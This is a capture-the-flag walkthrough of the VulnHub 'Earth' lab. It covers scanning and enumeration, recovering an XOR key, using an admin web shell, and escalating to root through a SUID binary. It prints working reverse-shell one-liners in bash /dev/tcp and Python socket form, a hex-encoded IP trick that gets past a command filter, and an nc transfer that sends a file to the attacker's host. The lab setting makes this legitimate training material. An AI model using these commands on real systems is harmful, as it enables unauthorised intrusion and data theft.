Attacker IP: 192.168.0.110
Disable USB before powering on the VM, otherwise the VM will not boot.
Host discovery: sudo nmap -sP 192.168.0.1/24
Result: 192.168.0.105
Port scan: sudo nmap -sC -sV -p- 192.168.0.105 -oN Earth
-sC run the default NSE scripts for the service identified on each port
-sV probe open ports for service and version information
-p- scan all ports, 1-65535
-oN write normal output to the given file
Result:
Ports 22, 80 and 443 are open
Apache 2.4.51
443: TLS certificate Subject Alternative Name DNS:earth.local
DNS:terratest.earth.local
Browsing to 192.168.0.105:80 -> Bad Request (400)
Browsing to 192.168.0.105:443 -> Bad Request (400)
Bind the hostnames -> edit the hosts file:
sudo chmod +x /etc/hosts
sudo vi /etc/hosts
192.168.0.105 earth.local terratest.earth.local
Browse to
http://earth.local
The page shows an image of the Earth with three strings of numbers at the bottom:
3714171e0b0a550a1859101d064b160a191a4b0908140d0e0d441c0d4b1611074318160814114b0a1d06170e1444010b0a0d441c104b150106104b1d011b100e59101d0205591314170e0b4a552a1f59071a16071d44130f041810550a05590555010a0d0c011609590d13430a171d170c0f0044160c1e150055011e100811430a59061417030d1117430910035506051611120b45
http://terratest.earth.local/ shows "Test site, please ignore"
Next, directory enumeration:
gobuster dir -u http://earth.local -w /usr/share/dirb/wordlists/big.txt -x .php,.txt,.zip -k
Found an /admin directory; opening it gives a login page that asks for a username and password.
Continue by enumerating terratest.earth.local:
gobuster dir -u https://terratest.earth.local -w /usr/share/dirbuster/wordlists/directory-list-2.3-medium.txt -x .php,.txt,.zip -k
Found /robots.txt -> open https://terratest.earth.local/robots.txt in the browser
The last entry is /testingnotes.*; guessing the extension and opening the file gives the following notes:
Testing secure messaging system notes:
*Using XOR encryption as the algorithm, should be safe as used in RSA.
*Earth has confirmed they have received our sent messages.
*testdata.txt was used to test encryption.
*terra used as username for admin portal.
Todo:
*How do we send our monthly keys to Earth securely? Or should we change keys weekly?
*Need to test different key lengths to protect against bruteforce. How long should the key be?
*Need to improve the interface of the messaging interface and the admin panel, it's currently very basic.
From the hints: the encryption algorithm is XOR, testdata.txt is the test input, and terra is the admin username.
Browsing to testdata.txt -> a paragraph describing the Earth -> download it:
wget https://terratest.earth.local/testdata.txt --no-check-certificate
Write a Python script to XOR-decode it:
import binascii

# One of the hex strings from the earth.local page (the value was stripped from this copy of the writeup)
key = "<hex string copied from http://earth.local>"
# testdata.txt as a hex string
testdata = binascii.b2a_hex(open('testdata.txt', 'rb').read()).decode()
# XOR as big integers: this right-aligns the two values and drops leading zero bytes,
# which is fine here because the message and testdata.txt have the same length
print(hex(int(key, 16) ^ int(testdata, 16)))
Result:
0x6561727468636c696d6174656368616e67656261643468756d616e736561727468636c696d6174656368616e67656261643468756d616e736561727468636c696d6174656368616e67656261643468756d616e736561727468636c696d6174656368616e67656261643468756d616e736561727468636c696d6174656368616e67656261643468756d616e736561727468636c696d6174656368616e67656261643468756d616e736561727468636c696d6174656368616e67656261643468756d616e736561727468636c696d6174656368616e67656261643468756d616e736561727468636c696d6174656368616e67656261643468756d616e736561727468636c696d6174656368616e67656261643468756d616e736561727468636c696d6174656368616e67656261643468756d616e736561727468636c696d6174656368616e67656261643468756d616e736561727468636c696d6174656368616e67656261643468756d616e736561727468636c696d6174656368616e67656261643468756d616e736561727468636c696d6174
The sequence 6561727468636c696d6174656368616e67656261643468756d616e73 repeats throughout; converting the hex to text (an online converter works) gives: earthclimatechangebad4humans
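As an added example (not part of the original writeup), the key recovery above can be done without eyeballing the repeating block: XOR the ciphertext with the known plaintext to get the keystream, then take its shortest period. The plaintext and ciphertext below are constructed for the demo using the key the writeup recovered; it assumes the message and the plaintext have the same length, which is why it XORs bytes rather than big integers.

```python
from itertools import cycle

# Key the writeup recovered; used here only to build a constructed demo ciphertext.
KEY = b"earthclimatechangebad4humans"
# Constructed sample plaintext standing in for testdata.txt (not the real file).
SAMPLE_PLAINTEXT = (b"According to the mission log, Earth has confirmed that it "
                    b"received every message we sent this month.")


def xor_bytes(a: bytes, b: bytes) -> bytes:
    """XOR two byte strings position by position (the page's int-based XOR
    right-aligns and drops leading zero bytes; bytes XOR has neither issue)."""
    if len(a) != len(b):
        raise ValueError("ciphertext and known plaintext must have the same length")
    return bytes(x ^ y for x, y in zip(a, b))


def xor_encrypt(plaintext: bytes, key: bytes) -> bytes:
    """Repeating-key XOR, the scheme the testing notes describe."""
    return bytes(p ^ k for p, k in zip(plaintext, cycle(key)))


def smallest_period(data: bytes, max_len: int = 64) -> int:
    """Shortest p with data[i] == data[i - p] for every i >= p; len(data) if none found."""
    for p in range(1, min(max_len, len(data)) + 1):
        if all(data[i] == data[i - p] for i in range(p, len(data))):
            return p
    return len(data)


def recover_key(ciphertext: bytes, known_plaintext: bytes) -> bytes:
    """ciphertext = plaintext XOR keystream, so XORing the known plaintext back
    yields the keystream; for a repeating key, one period of it is the key."""
    keystream = xor_bytes(ciphertext, known_plaintext)
    return keystream[: smallest_period(keystream)]


# Constructed demo ciphertext: what the page's message would look like if
# testdata.txt had the sample content above.
DEMO_CIPHERTEXT = xor_encrypt(SAMPLE_PLAINTEXT, KEY)

if __name__ == "__main__":
    print(recover_key(DEMO_CIPHERTEXT, SAMPLE_PLAINTEXT).decode())
```

The period search only works once the known plaintext is longer than the key repeated about twice; a short sample returns the whole keystream instead.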
Back at http://earth.local/admin, logging in with terra / earthclimatechangebad4humans succeeds; the admin panel is a web shell that runs system commands.
find / -name "*flag*" to look for flag-related files -> /var/earth_web/user_flag.txt
cat /var/earth_web/user_flag.txt -> user_flag_3353b67d6437f07ba7d34afd7d2fc27d
Reverse shell:
bash -i >& /dev/tcp/192.168.0.100/1234 0>&1 --> Remote connections are forbidden
python -c 'import socket,subprocess,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect(("192.168.0.100",1234));os.dup2(s.fileno(),0);os.dup2(s.fileno(),1);os.dup2(s.fileno(),2);p=subprocess.call(["/bin/bash","-i"]);' --> after removing the input length limit, same result as above: remote connections are forbidden
Listing files with ls -> /var/earth_web -> secure_message -> forms.py -> it filters the IP address in the command
Encode the IP address in hex: 192.168.0.110 -> 0xc0.0xa8.0x00.0x6e
bash -i >& /dev/tcp/0xc0.0xa8.0x00.0x6e/1234 0>&1
Reverse shell obtained
find / -perm -u=s -type f 2>/dev/null -> list SUID files
find / -perm /u=s -type f 2>/dev/null (equivalent form)
-perm match by permission bits: ugo (user/group/other), rwx (read/write/execute)
s is the SUID/SGID special bit
-type file type: f -> regular file, d -> directory
2>/dev/null discards error output. 2 is stderr (0 is stdin, 1 is stdout); > truncates and then writes, >> appends; /dev/null is the bit bucket, any data written to it is discarded.
/usr/bin/reset_root looks like it could be used for privilege escalation
Running reset_root directly fails with an error, so send it to Kali for analysis
kali (root): nc -nlvp 1234 > reset_root
shell: nc 192.168.0.110 1234 < /usr/bin/reset_root
kali: strace /home/kali/reset_root -> reset_root has no execute permission, add it first (chmod +x)
access("/dev/shm/kHgTFI5G", F_OK) = -1 ENOENT (No such file or directory)
access("/dev/shm/Zw7bV9U5", F_OK) = -1 ENOENT (No such file or directory)
access("/tmp/kcM0Wewe", F_OK) = -1 ENOENT (No such file or directory)
Create the three files in the shell:
touch /dev/shm/kHgTFI5G
touch /dev/shm/Zw7bV9U5
touch /tmp/kcM0Wewe
Run reset_root in the shell -> it prints the root password: Earth
su -> Password: Earth -> root obtained
cd /root -> cat root_flag.txt -> flag obtained
Originally published on the WeChat public account 北京路劲科技有限公司: VulnHub靶场Earth (VulnHub lab: Earth)